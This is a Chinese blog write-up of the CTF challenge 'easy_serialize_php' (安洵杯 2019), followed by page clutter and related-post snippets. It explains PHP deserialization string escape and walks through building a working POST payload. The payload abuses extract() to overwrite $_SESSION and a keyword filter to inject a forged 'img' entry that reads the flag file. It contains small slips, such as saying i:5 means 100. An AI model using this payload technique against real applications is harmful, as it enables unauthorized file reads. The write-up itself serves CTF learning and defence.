[安洵杯 2019]easy_serialize_php---关于php反序列化的一些思考

最新推荐文章于 2022-10-20 18:15:33 发布
最新推荐文章于 2022-10-20 18:15:33 发布
阅读量244 收藏
点赞数 2
分类专栏: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/StevenOnesir/article/details/111484107
版权

这道题值得拿出来说一下,是因为涉及到了反序列化逃逸的一些基本知识

首先有几个点值得去思考一下,我们知道一般序列化的格式是:

{i:5;s:9:"aaaaaaaaa";}

上面的序列化格式其实表示的是一个整数变量值为100与一个String值为"aaaaaaaaa"。

如果我们在序列化好的字符串中加入 ;} 字符就能在中间起到反序列化时的截断效果。同时如果前面的字符数、类型等正常对应,反序列化时是能正常解析并起到覆盖变量的效果的,这就叫做php反序列化的字符逃逸。

我们构建payload只需要保证这一点就行了。

因为所有格式化的数据只要可以被修改,那一定有可能出现漏洞。

首先根据代码提示:

if($function == 'highlight_file'){
    highlight_file('index.php');
}else if($function == 'phpinfo'){
    eval('phpinfo();'); //maybe you can find something in here!

我们直接传入GET变量f=pipinfo,可以在phpinfo信息里发现文件:

d0g3_f1ag.php

根据代码提示对其进行base64处理得到:

ZDBnM19mMWFnLnBocA==

再跟进代码:

if($_SESSION){
    unset($_SESSION);
}

源码中的部分处理其实完全可以忽略,这里操作的是_SESSION这个数组而已。


if(!$_GET['img_path']){
    $_SESSION['img'] = base64_encode('guest_img.png');
}else{
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}

这里的处理也告诉我们,通过正常的GET方式传入img_path会被sha1处理。

echo file_get_contents(base64_decode($userinfo['img']));

这样最后的base64_decode就会出现问题。也别去考虑sha1的构造了,构造难度挺大。

所以我们可以采用别的方式传入_SESSION数组元素,并进行反序列化字符逃逸。

_SESSION[flagflag]=";s:1:"a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}

为什么要这么构建payload呢?

首先我们要看到代码里的:

$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;

extract($_POST);

这里对$_SESSION中的user与function两个键进行了赋值,随后就用extract处理了POST变量。所以利用思路就是用user&function进行处理从而字符串逃逸吗?其实有更简单的方法,就是控制$_SESSION本身

再看我们的payload:

_SESSION[flagflag]=";s:1:"a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}

这里在进行filter的时候,SESSION里面的flagflag就都被过滤掉了,所以我们就多出了8位去构建后面的字符。

为什么刚好多八位呢?

首先我们序列化 _SESSION[flagflag]="; 看一看。

a:1:{s:8:"flagflag";s:2:"";";}

过滤过后:

a:1:{s:8:"";s:2:"";";}

注意看s:8:"后面,一直到第二个;前面的引号闭合,这里一共有7位。
那为什么是8而不是flagphp这样构建7位呢?

别急,我们再在后面跟上添加一下我们要伪造的img。

序列化一下:_SESSION[flagflag]=";s:3:“img”;s:20:“ZDBnM19mMWFnLnBocA==”;}

这里我们已经把我们要传入的img参数送进去了,得到的结果是:

在这里插入图片描述

注意看这里的41,代表的是_SESSION[flagflag]的内容长度,这个时候我们闭合内的字符数就变成了8。

这也是我们这里用flagflag的原因,这样刚好处理恰当。

再看payload:

_SESSION[flagflag]=";s:1:"a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}

我们为什么要传入一个无关的a呢?这里的a是作为这里:
在这里插入图片描述
第一位的值。不然后面的正常键值对关系是构造错误的,不能正常反序列化。

我们 send 一下 payload:
在这里插入图片描述
回显了flag的位置。
前面构造的8位允许_SESSION[flagflag]的长度在两位数,所以我们直接对新的目标地址base64处理,得到:L2QwZzNfZmxsbGxsbGFn。

刚好也是20位,所以直接替换成上面的base64字符串就行。

最终paylaod:

_SESSION[flagflag]=";s:1:"a";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}

观察回显:

在这里插入图片描述
至此结束。

考查知识点:

php反序列化字符串逃逸

代码审计与思考

题目难度:

简单

总结:

学会审计代码,安全工作中不要暴露出格式化数据的操作接口。

StevenOnesir
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
c#对象序列化和反序列化,压缩流
03-17
c#对象 序列化 和 反序列化 ,压缩流
[安洵 2019]easy_serialize_php (对象逃逸)
qq_54929891的博客
03-09 3432
老规矩,分析代码,一般给你一大堆代码的题目肯定是其中某个函数有漏洞啥的 过滤函数filter,其中implode函数的作用是:将$filter_arr这个数组合并为一个字符串,并以|分割开来;所以这个正则表达式是preg_replace(/php|flag|php5|php4|f1lg/i,'',$img);filter函数作用就是过滤这五个字符串。 如果$_SESSION存在,则销毁它(unset),然后是字典的键值对的对应,extract这个函数重中之重!!!它会将你post传入的...
数组的序列化
刘锐群的笔记
04-14 9509
数组的序列化就是将数组的数据转化为字符串,以便传递和数据库存储。而对应的反序列化就是将字符串的数据转化成为数组数据了。 序列化对应的函数为 serialize(), 反序列化对应的函数为:unserialize(). 可以将前者序列化之后的数据存到数据库的某个字段中,使用时再通过反序列化处理。 下面举一简单例子:     $arr = array('张三','李四'
2021-7-22 [安洵 2019]easy_serialize_php 知识点:变量覆盖,php反序列化字符串逃逸
m0_51326092的博客
07-22 521
文章目录前言重要知识点变量覆盖:PHP序列化和反序列化解题过程总结 前言 本身是要在昨天解这题的,结果解着解着就去做了session反序列化的题目了o(╥﹏╥)o,于是昨天的题今天做(o)/~,这个知识点也是第一次遇到,菜菜的我学习到了,翻阅了很多大佬的博客才一知半解,需要继续努力!!! 重要知识点 变量覆盖: extract示例讲解网站 extract(): 作用: 从数组中将变量导入到当前的符号表;该函数使用数组键名作为变量名,使用数组键值作为变量值。针对数组中的每个元素,将在当前符号表中创建对应的
PHP基础知识 - 会话控制 - session
Chon.Wang
07-18 279
PHP 会话控制 session
PHPSERIALIZE和JSON的序列化与反序列化操作区别分析
10-21
主要介绍了PHPSERIALIZE和JSON的序列化与反序列化操作区别,结合实例形式较为详细的分析了php中序列化与反序列化操作的感念、区别、使用方法与相关操作技巧,需要的朋友可以参考下
php_igbinary-2.0.8-1.0-nts-vc14-x86.zip
11-23
`igbinary`是其中一个扩展,它提供了序列化和反序列化机制,用于在PHP环境中存储和传输数据。 **igbinary扩展详解** igbinary是一个优化的序列化库,它替代了PHP默认的序列化机制(serialize/unserialize)。传统...
cpp-swooleserialize是目前php7中最快的序列化函数
08-15
PHP开发中,序列化和反序列化是常见的数据处理操作,它们允许我们将变量的状态转换为字符串以便存储或传输,然后在需要时恢复为原始结构。`swoole_serialize`是一个专门为PHP7设计的高性能序列化库,尤其在C/C++...
se_mouz_image.rar_serialize_序列化
09-23
在这个“se_mouz_image.rar_serialize_序列化”的主题中,我们将深入探讨如何利用`serialize()`函数来序列化文档以及实现鼠标画图功能。 首先,我们来详细解释一下`serialize()`函数。`serialize()`是PHP内建的一个...
json.zip_JSON_json c#_json-c
09-19
在C#中,你可以使用`JsonSerializer`类来序列化和反序列化对象到JSON字符串。例如,将一个对象转换为JSON字符串: ```csharp using System.Text.Json; public class Person { public string Name { get; set; } ...
protobuf文件的反序列化
07-03
通过proto工具编译的message结构被序列化,无法看出proto组织结构,通过这里的工具实现反序列化,清楚看到原messgae结构。注意:第六步运行的脚本操作过程按照其中的pdf文件最后的dos命令进行操作。
易语言ProtoBuf支持库 (普通版) (1.0#20171111版)(静态版eProtoBuf.fne).rar
08-31
易语言ProtoBuf支持库 (普通版) (1.0#20171111版)(静态版eProtoBuf.fne).rar
[安洵 2019]easy_serialize_php
qq_43801002的博客
08-01 446
题目 <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return preg_replace($filter,'',$img); } if($_SESSION){ unset($_SESSION); }
buuctf刷题9 (反序列化逃逸&shtml-SSI远程命令执行&idna与utf-8编码漏洞)
weixin_63231007的博客
10-20 1951
如果我们传入 _SESSION[imgflagphp]=1111 会发现 s:10:"img" 我们输入的flagphp被替换为了空,只剩下了img,这样就有反序列化逃逸那味了,逃逸了7个字符。序列化串为:a:4:{s:5:"phone";因为我们要让img的内容为d0g3_f1ag.phpbase64编码后的字符串,所以要传_SESSION[img]=s:3:"img";看一下这个序列化串:a:2:{s:10:"img";s:3:"img";
------已搬运-------BUUCTF:[安洵 2019]easy_serialize_php 1(extract,字符逃逸 session反序列化的另类~.~ )
Zero_Adam的博客
02-06 623
学到的 extract的覆盖数组的操作比如能够覆盖SESSION这个全局数组! 看phpinfo时的注意点 代码审计的能力 字符串逃逸,之前还有一条路可以走,但是后来发现走不通,不过也是个好思路 劝像我一样的rookies。本地自己实验很重要,那些大佬们的payload也是不知实验了多少次才出来的。本地实验的多了,自己也就明白了 源码+我的一些注释 源码多看几遍,找找思路,灵感 <?php $function = @$_GET['f']; function filter($img){ $f
Newtonsoft.Json.dll 反序列化JSON字符串
热门推荐
马兆娟 廊坊师范学院信息技术提高班第八期
02-21 4万+
上一篇JSON博客《JSON入门级学习小结--JSON数据结构》中已对JSON做了简单介绍,JSON字符串数组数据样式大概是这样子的:               如今因为项目需求(asp.net web网站,前台向后台传递JSON数据,并对JSON数据处理,详述见博客《  《项目经验》--通过js获取前台数据向一般处理程序传递Json数据,并解析Json数据,将前台传来的Json
Web安全新手入门学习Week9
m0_59271033的博客
04-11 2871
新手入门Web安全
web buuctf [安洵 2019]easy_serialize_php
weixin_44214568的博客
04-02 440
考点:反序列化逃逸 这个题目是一道php代码审计题目,打开就是源码, <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return pr
[安洵 2019]easy_serialize_php 1
最新发布
03-16
// 反序列化 $data = unserialize('O:4:"User":2:{s:4:"name";s:5:"Alice";s:3:"age";i:18;}'); // 修改属性值 $data->age = 20; // 序列化 $serialized = serialize($data); echo $serialized; ?> ``` 最终输出...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值